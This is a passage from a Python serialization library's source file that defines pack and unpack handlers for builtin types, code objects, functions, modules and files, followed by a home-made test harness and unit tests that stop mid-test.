will typically not have any attributes or anything and in most cases
will only exist once in an interpreter. These are things like the
"object" type, or "float" type, etc.
'''
@classmethod
def new(cls, *args, **kwds):
'''
This method will create a new instance of the class returned by
the getclass() classmethod with the parameters provided as its
arguments.
'''
return cls.getclass()(*args, **kwds)
@classmethod
def p_instance(cls, object, **attributes):
'''
As the type is a constant, there are no attributes that are needed
to update the type. This method will simply return an empty tuple.
'''
return ()
@classmethod
def u_constructor(cls, data, **attributes):
'''
As the type is a constant, there are no parameters needed to
construct it. this method will simply return the type returned by
the getclass() classmethod.
'''
return cls.getclass()
@package.cache.register_const
class type(__constant):
@classmethod
def getclass(cls):
return builtins.type
@package.cache.register_const
class object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@package.cache.register_const
class module(__constant):
@classmethod
def getclass(cls):
return builtins.__class__
@classmethod
def instancelocal(cls, modulename, **kwds):
# XXX: this might be broken when re-constructing package modules
# where relative imports are used.
return __import__(modulename)
@classmethod
def instance(cls, modulename, doc=None):
try:
return cls.instancelocal(modulename, doc=doc)
except ImportError:
pass
return cls.new(modulename, doc)
@package.cache.register_const
class bool(__constant):
@classmethod
def getclass(cls):
return builtins.bool
@package.cache.register_const
class int(__constant):
@classmethod
def getclass(cls):
return (0).__class__
@package.cache.register_const
class float(__constant):
@classmethod
def getclass(cls):
return 0.0.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class long(__constant):
@classmethod
def getclass(cls):
return eval('0L').__class__
@package.cache.register_const
class complex(__constant):
@classmethod
def getclass(cls):
return 0j.__class__
@package.cache.register_const
class str(__constant):
@classmethod
def getclass(cls):
return ''.__class__
if sys.version_info.major < 3:
@package.cache.register_const
class unicode(__constant):
@classmethod
def getclass(cls):
return u''.__class__
@package.cache.register_const
class buffer(__constant):
@classmethod
def getclass(cls):
return builtins.buffer('').__class__
else:
@package.cache.register_const
class bytes(__constant):
@classmethod
def getclass(cls):
return b''.__class__
@package.cache.register_const
class tuple(__constant):
@classmethod
def getclass(cls):
return ().__class__
@package.cache.register_const
class list(__constant):
@classmethod
def getclass(cls):
return [].__class__
@package.cache.register_const
class dict(__constant):
@classmethod
def getclass(cls):
return {}.__class__
@package.cache.register_const
class set(__constant):
@classmethod
def getclass(cls):
return {item for item in []}.__class__
@package.cache.register_const
class frozenset(__constant):
@classmethod
def getclass(cls):
return builtins.frozenset
@package.cache.register_const
class instancemethod(__constant):
@classmethod
def getclass(cls):
return cls.getclass.__class__
@package.cache.register_const
class property(__constant):
@classmethod
def getclass(cls):
return builtins.property
@package.cache.register_const
class code(__constant):
@classmethod
def getclass(cls):
res = lambda: None
return res.func_code.__class__ if sys.version_info.major < 3 else res.__code__.__class__
if sys.version_info.major < 3:
@classmethod
def new(cls, argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
else:
@classmethod
def new(cls, argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename='<memory>', name='<unnamed>', firstlineno=0, lnotab='', freevars=(), cellvars=()):
i, s, t, b = (0).__class__, ''.__class__, ().__class__, b''.__class__
optional = lambda x: lambda y: (y, ())[y is None] # FIXME: it'd be less stupid to not ignore the provided type in 'x'
types = [ i, i, i, i, i, i, b, t, t, t, s, s, i, b, optional(t), optional(t) ]
values = [ argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize, flags, codestring, constants, names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars ]
for idx, cons in enumerate(types):
values[idx] = cons(values[idx])
return cls.getclass()(*values)
@package.cache.register_const
class function(__constant):
@classmethod
def getclass(cls):
return (lambda:0).__class__
@classmethod
def new(cls, code, globs, **attributes):
'''Create a new function'''
name = attributes.get('name', code.co_name)
argdefs = attributes.get('argdefs', ())
closure = attributes.get('closure', ())
c = cls.getclass()
return c(code, globs, name, argdefs, closure)
@package.cache.register_const
class builtin(__constant):
@classmethod
def getclass(cls):
return builtins.setattr.__class__
@package.cache.register_const
class generator(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).__class__
@package.cache.register_const
class frame(__constant):
@classmethod
def getclass(cls):
return (x for x in [0]).gi_frame.__class__
@package.cache.register_const
class Staticmethod(__constant):
@classmethod
def getclass(cls):
return builtins.staticmethod
@package.cache.register_const
class Classmethod(__constant):
@classmethod
def getclass(cls):
return builtins.classmethod
## real constant
@package.cache.register_const
class none(__constant):
@classmethod
def getclass(cls):
return None
@package.cache.register_const
class true(__constant):
@classmethod
def getclass(cls):
return True
@package.cache.register_const
class false(__constant):
@classmethod
def getclass(cls):
return False
@package.cache.register_const
class notImplemented(__constant):
@classmethod
def getclass(cls):
return builtins.NotImplemented
@package.cache.register_const
class ellipsis(__constant):
@classmethod
def getclass(cls):
return builtins.Ellipsis
if sys.version_info.major < 3:
@package.cache.register_const
class file(__constant):
@classmethod
def getclass(cls):
return builtins.file
import _weakref
@package.cache.register_const
class weakref(__constant):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@package.cache.register_const
class super(__constant):
@classmethod
def getclass(cls):
return builtins.super
import _thread
@package.cache.register_const
class threadlock(__constant):
@classmethod
def getclass(cls):
return _thread.LockType
if 'core':
@package.cache.register_type
class type_(__type__):
'''any generic python type'''
# FIXME: when instantiating the hierarchy of types, this fails to associate
# the method with the proper parent class. this is apparent if you
# compare the help() of the original object to the deserialized object
@classmethod
def getclass(cls):
return type.getclass()
@classmethod
def subclasses(cls, type):
'''return all subclasses of type'''
if not builtins.isinstance(type, builtins.type):
raise AssertionError('%s is not a valid python type'% builtins.type(type))
if type.__bases__ == ():
return ()
result = type.__bases__
for x in type.__bases__:
result += cls.subclasses(x)
return result
@classmethod
def p_constructor(cls, object, **attributes):
name, bases, slots = (object.__name__, object.__bases__, ().__class__(getattr(object, '__slots__')) if hasattr(object, '__slots__') else None)
result = [slots, name]
result.extend(bases)
return ().__class__(result)
@classmethod
def u_constructor(cls, data, **attributes):
result = [].__class__(data)
slots, name = result.pop(0), result.pop(0)
if slots is None:
return builtins.type(name, ().__class__(result), {})
return builtins.type(name, ().__class__(result), {'__slots__': slots})
@classmethod
def p_instance(cls, object, **attributes):
state = {key : value for key, value in getattr(object, '__dict__', {}).items()}
if hasattr(object, '__slots__'):
state.update((k, getattr(object, k)) for k in object.__slots__ if hasattr(object, k))
f = lambda: wat
t = builtins.type(f)
# non-serializeable descriptors
getset_descriptor = cls.__weakref__.__class__
method_descriptor = cls.__reduce_ex__.__class__
wrapper_descriptor = cls.__setattr__.__class__
member_descriptor = t.func_globals.__class__ if sys.version_info.major < 3 else t.__globals__.__class__
classmethod_descriptor = builtins.type(builtins.float.__dict__['fromhex'])
result = {}
for k, v in state.items():
if builtins.type(v) in {getset_descriptor, method_descriptor, wrapper_descriptor, member_descriptor, classmethod_descriptor, generator_.getclass()}:
continue
try:
_ = package.cache.byinstance(v)
except (KeyError, TypeError):
continue
result[k] = v
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
for k, v in data.items():
try:
setattr(instance, k, v)
except (TypeError, AttributeError):
pass
return instance
if sys.version_info.major < 3:
@package.cache.register_type
class classobj(type_):
'''an old-style python class'''
@classmethod
def getclass(cls):
return builtins.type(package)
@package.cache.register_type
class Object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@package.cache.register
class object_(type_):
'''a generic python object and all it's parentclass' properties'''
@classmethod
def p_constructor(cls, object, **attributes):
name, type = getattr(object, '__name__', None), object.__class__
# FIXME: we should check for serialization methods here
# like getnewargs, getstate, reduce, etc.
return (name, type)
@classmethod
def u_constructor(cls, data, **attributes):
name, type = data
type.__name__ = name or ''
object = cls.getclass()
wrapper_descriptor, builtin_function_or_method = (item.__class__ for item in [object.__init__, object.__new__])
# FIXME: create the instance illegitimately
if type.__new__.__class__ is not builtin_function_or_method:
raise Exception('Unable to support custom-defined .__new__ operators')
# TODO: bniemczyk would like a hint here for customizing __new__
old_init, new_init = type.__init__, lambda self: None,
type.__init__ = new_init
result = type()
type.__init__ = old_init
#result.__name__ = name
return result
@classmethod
def p_instance(cls, object, **attributes):
c = type_
result = [(c.id, c.p_instance(object, **attributes))]
for t in type_.subclasses(builtins.type(object)):
try:
c = package.cache.byclass(t)
except KeyError:
continue
result.append( (c.id, c.p_instance(object, **attributes)) )
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
if len(data) == 0:
return instance
for id, data in data:
c = package.cache.byid(id)
instance = c.u_instance(instance, data, **attributes)
return instance
@package.cache.register
class module_local(__constant):
'''module that is locally stored in the filesystem'''
@classmethod
def getclass(cls):
return module.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__name__
@classmethod
def u_constructor(cls, data, **attributes):
name = data
return module.instancelocal(name)
@package.cache.register_type
class module_(module_local):
'''a module and it's attributes in memory'''
@classmethod
def p_constructor(cls, object, **attributes):
if sys.version_info.major < 3:
return '', object.__name__, object.__doc__
spec = object.__spec__
return spec.name if isinstance(spec.loader, __import__('_frozen_importlib').BuiltinImporter) else '', object.__name__, object.__doc__
@classmethod
def u_constructor(cls, data, **attributes):
spec, name, doc = data
if sys.version_info.major < 3 or not spec:
return cls.new(name, doc)
res = __import__('spec')
res.__name__, res.__doc__ = name, doc
return res
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major >= 3 and hasattr(object, '__spec__') and isinstance(object.__spec__.loader, __import__('_frozen_importlib').BuiltinImporter):
return {}
ignored = ('__builtins__', '__loader__')
return {k : v for k, v in object.__dict__.items() if k not in ignored}
@classmethod
def u_instance(cls, instance, data, **attributes):
for attribute, value in data.items():
setattr(instance, attribute, value)
return instance
if sys.version_info.major >= 3:
@package.cache.register_const
class ModuleSpec(__constant):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@package.cache.register_type
class ModuleSpec_(__type__):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@classmethod
def p_constructor(cls, object, **attributes):
#return object.name, object.loader, object.origin, object.loader_state, hasattr(object, '__path__')
return object.name, None, object.origin, object.loader_state, hasattr(object, '__path__')
@classmethod
def u_constructor(cls, data, **attributes):
cons = cls.getclass()
name, loader, origin, loader_state, is_package = data
#return cons(name, loader, parent=parent, origin=origin, loader_state=loader_state, is_package=is_package)
return cons(name, None, origin=origin, loader_state=loader_state, is_package=is_package)
@classmethod
def p_instance(cls, object, **attributes):
return object.submodule_search_locations
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.submodule_search_locations = data
return instance
if 'builtin':
class __builtin(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class bool_(__builtin):
'''standard boolean type'''
@classmethod
def getclass(cls):
return bool.getclass()
@package.cache.register_type
class int_(__builtin):
'''integral value'''
@classmethod
def getclass(cls):
return int.getclass()
@package.cache.register_type
class float_(__builtin):
'''float value'''
@classmethod
def getclass(cls):
return float.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class long_(__builtin):
'''long value'''
@classmethod
def getclass(cls):
return long.getclass()
@package.cache.register_type
class complex_(__builtin):
'''complex value'''
@classmethod
def getclass(cls):
return complex.getclass()
## sequence types
@package.cache.register_type
class str_(__builtin):
'''str value'''
@classmethod
def getclass(cls):
return str.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class unicode_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return unicode.getclass()
@package.cache.register_type
class buffer_(__builtin):
'''string buffer'''
@classmethod
def getclass(cls):
return buffer.getclass()
else:
@package.cache.register_type
class bytes_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return bytes.getclass()
if 'immutable':
@package.cache.register_type
class tuple_(__type__):
'''an immutable tuple'''
@classmethod
def getclass(cls):
return tuple.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return ().__class__(data)
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
if 'mutable':
class __mutable(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class list_(__mutable):
'''a list'''
@classmethod
def getclass(cls):
return list.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance[:] = data
return instance
@package.cache.register_type
class dict_(__mutable):
'''a dictionary'''
@classmethod
def getclass(cls):
return dict.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return object
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class set_(__mutable):
'''a set'''
@classmethod
def getclass(cls):
return set.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class frozenset_(__mutable):
'''a frozenset'''
@classmethod
def getclass(cls):
return frozenset.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
if 'special':
class __special(__type__):
attributes = None
@classmethod
def getclass(cls):
raise NotImplementedError(cls)
@classmethod
def p_constructor(cls, object, **attributes):
result = {}
if cls.attributes.__class__ == {}.__class__:
result.update((k, getattr(object, k, cls.attributes[k])) for k in cls.attributes)
else:
result.update((k, getattr(object, k)) for k in cls.attributes)
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class instancemethod_(__special):
'''a python class method'''
attributes = ['im_func', 'im_self', 'im_class']
@classmethod
def getclass(cls):
return instancemethod.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data['im_func'], data['im_self'], data['im_class'])
@package.cache.register_type
class property_(__special):
'''a python class property'''
attributes = ['fdel', 'fset', 'fget']
@classmethod
def getclass(cls):
return property.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return property.new(fget=data['fget'], fset=data['fset'], fdel=data['fdel'])
@package.cache.register_type
class code_(__special):
'''a python code type'''
if sys.version_info.major < 3:
attributes = [
'co_argcount', 'co_nlocals', 'co_stacksize', 'co_flags', 'co_code',
'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name',
'co_firstlineno', 'co_lnotab', 'co_freevars', 'co_cellvars'
]
else:
attributes = [
'co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize',
'co_flags', 'co_code', 'co_consts', 'co_names', 'co_varnames',
'co_filename', 'co_name', 'co_firstlineno', 'co_lnotab',
'co_freevars', 'co_cellvars'
]
@classmethod
def getclass(cls):
return code.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
result = (data[k] for k in cls.attributes)
return code.new(*result)
@package.cache.register_type
class function_(__type__):
'''a python function'''
@classmethod
def getclass(cls):
return function.getclass()
# FIXME: having to include the globals for an unbound function (__module__ is undefined) might be weird
@classmethod
def p_constructor(cls, object, **attributes):
# so...it turns out that only the closure property is immutable
res = object.func_closure if sys.version_info.major < 3 else object.__closure__
func_closure = () if res is None else res
func_code = object.func_code if sys.version_info.major < 3 else object.__code__
if object.__module__ is None:
raise AssertionError('FIXME: Unable to pack an unbound function')
return object.__module__, func_code, ().__class__(cell.cell_contents for cell in func_closure)
@classmethod
def u_constructor(cls, data, **attributes):
# modulename, code, closure, globals = data
modulename, code, closure = data
if object.__module__ is None:
raise AssertionError('FIXME: Unable to unpack an unbound function')
# XXX: assign the globals from hints if requested
globs = attributes['globals'] if 'globals' in attributes else module.instance(modulename).__dict__
result = cls.cell(*closure)
return function.new(code, globs, closure=result)
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major < 3:
return object.func_code, object.func_name, object.func_defaults
return object.__code__, object.__name__, object.__defaults__
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.func_code, instance.func_name, instance.func_defaults = data
return instance
@classmethod
def cell(cls, *args):
'''Convert args into a cell tuple'''
if sys.version_info.major < 3:
return ().__class__(((lambda item: lambda : item)(item).func_closure[0]) for item in args)
return ().__class__(((lambda item: lambda : item)(item).__closure__[0]) for item in args)
@package.cache.register
class builtin_(__constant):
'''copy from local module and name'''
@classmethod
def getclass(cls):
return builtin.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__module__, object.__name__)
@classmethod
def u_constructor(cls, data, **attributes):
mod, name = data
m = module.instancelocal(mod)
return getattr(m, name)
if sys.version_info.major < 3:
@package.cache.register
class file_(__constant):
'''A file..for serializing the contents of the file look at file_contents'''
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
return file.name, file.mode, offset
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset = data
file = open(name, mode)
file.seek(offset)
return file
@package.cache.register
class file_contents(file_):
# FIXME: save the whole file.. (should be selected via a hint)
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
file.seek(0)
content = file.read()
file.seek(offset)
return (file.name, file.mode, offset, content)
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset, content = data
file = open(name, "w")
file.write(content)
file.close()
file = open(name, mode)
file.seek(offset)
return file
import _weakref
@package.cache.register_type
class weakref_(__type__):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@classmethod
def p_constructor(cls, object, **attributes):
return (object(),)
@classmethod
def u_constructor(cls, data, **attributes):
object, = data
class extref(_weakref.ref):
def __new__(self, object):
self.__cycle__ = object
return _weakref.ref(object)
# return super(extref, self)(object)
return extref(object)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class super_(__type__):
@classmethod
def getclass(cls):
return builtins.super
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__thisclass__, object.__self__)
@classmethod
def u_constructor(cls, data, **attributes):
thisclass, self = data
return builtins.super(thisclass, self)
@classmethod
def p_instance(cls, object, **attributes):
return ()
import _thread
@package.cache.register_type
class threadlock_(__type__):
@classmethod
def getclass(cls):
return _thread.LockType # XXX
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return _thread.allocate_lock()
@classmethod
def p_instance(cls, object, **attributes):
return ()
# XXX: the following aren't completed...maybe never will be
@package.cache.register_type
class generator_(__type__):
@classmethod
def getclass(cls):
return generator.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type generator_') # Due to the gi_frame property
return object.gi_running, object.gi_code, object.gi_frame
@classmethod
def u_constructor(cls, data, **attributes):
co, fr = data
result = function.new(co, fr.f_globals)
raise NotImplementedError('Unable to unpack objects of type generator_')
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
@package.cache.register_type
class frame_(incomplete): # FIXME: can't construct these, we can create a shell object for these tho maybe
attributes = ['f_back', 'f_builtins', 'f_code', 'f_exc_traceback', 'f_exc_type', 'f_exc_value', 'f_globals', 'f_lasti', 'f_lineno', 'f_locals', 'f_restricted', 'f_trace']
@classmethod
def getclass(cls):
return frame.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type frame_')
@classmethod
def u_constructor(cls, data, **attributes):
raise NotImplementedError('Unable to unpack objects of type frame_')
@package.cache.register_type
class staticmethod_(__constant):
@classmethod
def getclass(cls):
return Staticmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
@package.cache.register_type
class classmethod_(__constant):
@classmethod
def getclass(cls):
return Classmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
import re, _sre
@package.cache.register_type
class re_pattern(__constant):
@classmethod
def getclass(cls):
res = _sre.compile('', 0, [1], 0, {}, ())
return res.__class__
@classmethod
def p_constructor(cls, object, **attributes):
return object.pattern, object.flags
@classmethod
def u_constructor(cls, data, **attributes):
pattern, flags = data
return re._compile(pattern, flags)
if 'operator':
import functools, operator
class __operator_reduceable(__constant):
@classmethod
def p_constructor(cls, object, **attributes):
return object.__reduce__()
@classmethod
def u_constructor(cls, data, **attributes):
t, parameters = data
return t(*parameters)
@package.cache.register_const
class partial(__constant):
@classmethod
def getclass(cls):
return functools.partial
@package.cache.register_type
class partial_(__operator_reduceable):
@classmethod
def getclass(cls):
return functools.partial
@classmethod
def p_constructor(cls, object, **attributes):
t = object.__class__
return t, (object.func, object.args, object.keywords)
@classmethod
def u_constructor(cls, data, **attributes):
t, (f, args, kwargs) = data
return t(f, *args, **kwargs)
@package.cache.register_const
class attrgetter(__constant):
@classmethod
def getclass(cls):
return operator.attrgetter
@package.cache.register_type
class attrgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.attrgetter
# Python2 methodology for determining which attributes
# of a class are being touched by an operator.
@classmethod
def attribute_collector(cls, append):
def closure(self, name, append=append):
items = [name]
append(items)
return cls.attribute_collector(items.append)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
@classmethod
def attribute_flatten(cls, items):
def collect(item):
if len(item) > 1:
head, tail = item[0], collect(item[1])
return [head] + tail
return item
return [collect(item) for item in items]
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.attribute_collector(state.append)
object(dummy)
attribs = cls.attribute_flatten(state)
return t, ().__class__('.'.join(item) for item in attribs)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class itemgetter(__constant):
@classmethod
def getclass(cls):
return operator.itemgetter
@package.cache.register_type
class itemgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.itemgetter
# Python2 methodology for determining which items
# of an object are being fetched by an operator.
@classmethod
def item_collector(cls, append):
def closure(self, item, append=append):
append(item)
return None
class dummy(object): pass
dummy.__getitem__ = closure
return dummy()
# Python2 methodology of figuring out the items
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.item_collector(state.append)
object(dummy)
return t, ().__class__(item for item in state)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class methodcaller(__constant):
@classmethod
def getclass(cls):
return operator.methodcaller
@package.cache.register_type
class methodcaller_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.methodcaller
# Python2 methodology for determining which attributes
# of a class will be called by an operator
@classmethod
def method_collector(cls, append):
def preserve(state):
def call(*args, **kwargs):
state.append((args, kwargs))
return call
def closure(self, name, callable=preserve, append=append):
item = [name]
append(item)
return callable(item)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.method_collector(state.append)
object(dummy)
f, (args, keywords) = state[0]
fargs = (f,) + args
return t, (fargs, keywords)
def __p_constructor_v3(cls, object, **attributes):
partial, args = object.__reduce__()
if partial is cls.getclass():
return partial, (args, {})
return partial.func, (partial.args + args, partial.keywords)
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@classmethod
def u_constructor(cls, data, **attributes):
t, (args, keywords) = data
return t(*args, **keywords)
## regular functions
#import cPickle as pickle
import marshal as pickle
def dumps(object, **attributes):
'''Convert any python object into a string.'''
return pickle.dumps(package.pack(object, **attributes))
def loads(data, **attributes):
'''Convert a string back into a python object.'''
return package.unpack(pickle.loads(data), **attributes)
def pack(object, **attributes):
'''Serialize an instance of a python object into a tuple'''
return package.pack(object, **attributes)
def unpack(data, **attributes):
'''Deserialize a tuple back into an instance'''
return package.unpack(data, **attributes)
import sys
def caller(frame=None):
"""Return the (module, name) of the requested frame.
This will default to the calling function if a frame is not supplied.
"""
import sys
fr = sys._getframe().f_back if frame is None else frame
source, name = fr.f_code.co_filename, fr.f_code.co_name
module = [x for x in sys.modules.values() if hasattr(x, '__file__') and (x.__file__.endswith(source) or x.__file__.endswith('%sc'%source))]
module, = (None,) if not module else module
return module, name
if __name__ == '__main__':
import traceback
class Result(Exception): pass
class Success(Result): pass
class Failure(Result): pass
Werror = True
TestCaseList = []
def TestCase(fn):
def harness(**kwds):
name = fn.__name__
try:
res = fn(**kwds)
raise Failure
except Success as E:
print('%s: %r'% (name, E))
return True
except Failure as E:
print('%s: %r'% (name, E))
except Exception as E:
print('%s: %r : %r'% (name, Failure(), E))
#print(traceback.format_exc())
return False
TestCaseList.append(harness)
return fn
if __name__ == '__main__':
from builtins import *
import builtins, fu
# lame helpers for testcases
def make_package(cls, cons, inst):
m, n = '__main__', 'unnamed'
result = (fu.VERSION, 0, ({0:(cls.id, cons)}, {0:(cls.id, inst)}))
# result = (fu.VERSION, 0, ({0:(cls.id, (m, n), cons)}, {0:(cls.id, inst)}))
return result
def extract_package(package):
_, id, (cons, inst) = package
return id, cons, inst
def check_package(package):
ver, id, (cons, inst) = package
if {item for item in cons.keys()} != {item for item in inst.keys()}:
return False
if ver != fu.VERSION:
return False
return id in cons
class A(object):
pass
class B(A):
def method(self):
return 'B'
class C1(B):
def method_c1(self):
return 'C1'
class C2(B):
def method_c2(self):
return 'C2'
class D(C1, C2):
def method_c1(self):
return 'D'
if __name__ == '__main__':
@TestCase
def test_pack_type():
input = True
result = fu.package.pack(input)
if check_package(result):
raise Success
@TestCase
def test_builtin_pack():
input = 0x40
result = fu.package.pack(input)
id, cons, inst = extract_package(result)
if cons[id][-1] == input:
raise Success
@TestCase
def test_builtin_unpack():
input = make_package(fu.bool_, True, ())
result = fu.package.unpack(input)
if result == True:
raise Success
@TestCase
def test_constant_unpack():
input = make_package(fu.none, (), ())
result = fu.package.unpack(input)
if result == None:
raise Success
@TestCase
def test_list_pack():
l = [item for item in range(5)]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(l) + 1:
raise Success
@TestCase
def test_listref_pack():
a = [item for item in range(5)]
l = 4 * [a]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
_, items = inst[id]
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + 1 and len({item for item in items}) == 1:
raise Success
@TestCase
def test_listrecurse_pack():
a = []
a.append(a)
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if inst[id][1][0] == id:
raise Success
@TestCase
def test_dict_pack():
l = {'hello': 'world', 5: 10, True: False}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(inst) == len(cons) == 2 * len(l) + 1:
raise Success
@TestCase
def test_dictref_pack():
a = [item for item in range(5)]
l = {'hello': a, 'world': a}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + len(l) + 1:
raise Success
@TestCase
def test_dictrecurse_pack():
a = {}
a[5] = a
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if check_package(result) and [item for item in inst[id][1].values()][0] == id:
raise Success
@TestCase
def test_listref_unpack():
a = [5]
a.append(a)
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[1][1][0] == 5:
raise Success
@TestCase
def test_dictref_unpack():
a = {}
a[5] = None
a[6] = a
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[6][5] is None:
raise Success
def test_code_packunpack_v2():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.func_code)
b = fu.package.unpack(a)
if func.func_code.co_name == b.co_name and func.func_code is not b:
raise Success
def test_code_packunpack_v3():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.__code__)
b = fu.package.unpack(a)
if func.__code__.co_name == b.co_name and func.__code__ is not b:
raise Success
test_code_packunpack = TestCase(test_code_packunpack_v2 if sys.version_info.major < 3 else test_code_packunpack_v3)
@TestCase
def test_func_packunpack():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func)
b = fu.package.unpack(a)
if func is not b and b('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_type_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah)
b = fu.package.unpack(a)
b = b()
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_instance_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_typevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah)
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_instancevalue_packunpack():
